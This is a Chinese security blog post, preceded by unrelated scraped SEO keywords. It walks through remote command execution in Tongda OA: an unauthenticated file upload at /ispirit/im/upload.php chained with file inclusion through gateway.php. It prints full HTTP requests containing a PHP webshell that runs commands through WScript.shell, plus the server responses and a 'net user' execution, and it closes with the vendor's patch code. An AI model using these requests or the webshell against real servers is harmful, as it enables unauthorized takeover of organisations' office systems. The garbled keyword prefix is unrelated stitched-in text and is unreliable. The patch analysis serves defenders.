软文网站推广法,如何做网课网站,男的和女的做那个视频网站,中企动力企业邮箱登录首页通达OA-命令执行一、环境安装文件#xff1a;链接:https://pan.baidu.com/s/1Y78Zs-7Igi4MRE0J_Dp-dQ 提取码:2b3i二、漏洞验证任意文件上传漏洞 /ispirit/im/upload.php本地文件包含漏洞 /ispirit/interface/gateway.php这两个路径不需要登录认证。burp抓包修改数据包上传文件…通达OA-命令执行一、环境安装文件链接:https://pan.baidu.com/s/1Y78Zs-7Igi4MRE0J_Dp-dQ 提取码:2b3i二、漏洞验证任意文件上传漏洞 /ispirit/im/upload.php本地文件包含漏洞 /ispirit/interface/gateway.php这两个路径不需要登录认证。burp抓包修改数据包上传文件POST /ispirit/im/upload.php HTTP/1.1Host: 127.0.0.1:8080Content-Length: 658Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q0.9,zh-HK;q0.8,ja;q0.7,en;q0.6,zh-TW;q0.5Cookie: PHPSESSID123Connection: close------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; nameUPLOAD_MODE2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; nameP123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; nameDEST_UID1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; nameATTACHMENT; filenamejpgContent-Type: image/jpeg$command$_POST[cmd];$wsh new COM(WScript.shell);$exec $wsh-exec(cmd /c .$command);$stdout $exec-StdOut();$stroutput $stdout-ReadAll();echo $stroutput;?------WebKitFormBoundarypyfBh1YB4pV8McGB--上传成功查看返回数据包HTTP/1.1200OKServer: nginxDate: Wed, 18 Mar 2020 12:12:58 GMTContent-Type: text/html; charsetgbkConnection: closeVary: Accept-EncodingSet-Cookie: PHPSESSID123; path/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check0, pre-check0Pragma: no-cacheX-Frame-Options: SAMEORIGINContent-Length: 41OK[vm]1432632003_1787828218|jpg|0[/vm]文件包含的filename2003/1787828218.jpg继续修改数据包 包含前面的文件名称并且执行系统命令POST/mac/gateway.phpHTTP/1.1Host: 127.0.0.1:8080Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 74Content-Type: application/x-www-form-urlencodedjson{url:/general/../../attach/im/2003/1787828218.jpg}cmdnet user命令执行成功上面验证方式是通过burp抓包验证成功下面通过python脚本验证成功命令执行三、修复代码补丁修复 /ispirit/im/upload.php原文件代码set_time_limit(0);$P $_POST[P];if (isset($P) || $P ! ) {ob_start();include_once inc/session.php;session_id($P);session_start();session_write_close();} else {include_once ./auth.php;}修改后代码删掉了else判断直接包含/auth.php//lp 2012/11/29 1:26:01 兼容客户端提交数据时无session的情况if(isset($P) || $P!){ob_start();include_once(inc/session.php);session_id($P);session_start();session_write_close();}include_once(./auth.php);auth.php这里就直接判断用的是否登录include_once inc/session.php;session_start();session_write_close();include_once inc/conn.php;include_once inc/utility.php;ob_start();if (!isset($_SESSION[LOGIN_USER_ID]) || $_SESSION[LOGIN_USER_ID] || !isset($_SESSION[LOGIN_UID]) || $_SESSION[LOGIN_UID] ) {sleep(1);if (!isset($_SESSION[LOGIN_USER_ID]) || $_SESSION[LOGIN_USER_ID] || !isset($_SESSION[LOGIN_UID]) || $_SESSION[LOGIN_UID] ) {echo -ERR . _(用户未登陆);exit;}}四、参考文档https://github.com/jas502n/OA-tongda-RCEhttps://www.cnblogs.com/potatsoSec/p/12516234.html公众号thelostworld个人知乎https://www.zhihu.com/people/fu-wei-43-69/columns个人简书https://www.jianshu.com/u/bf0e38a8d400
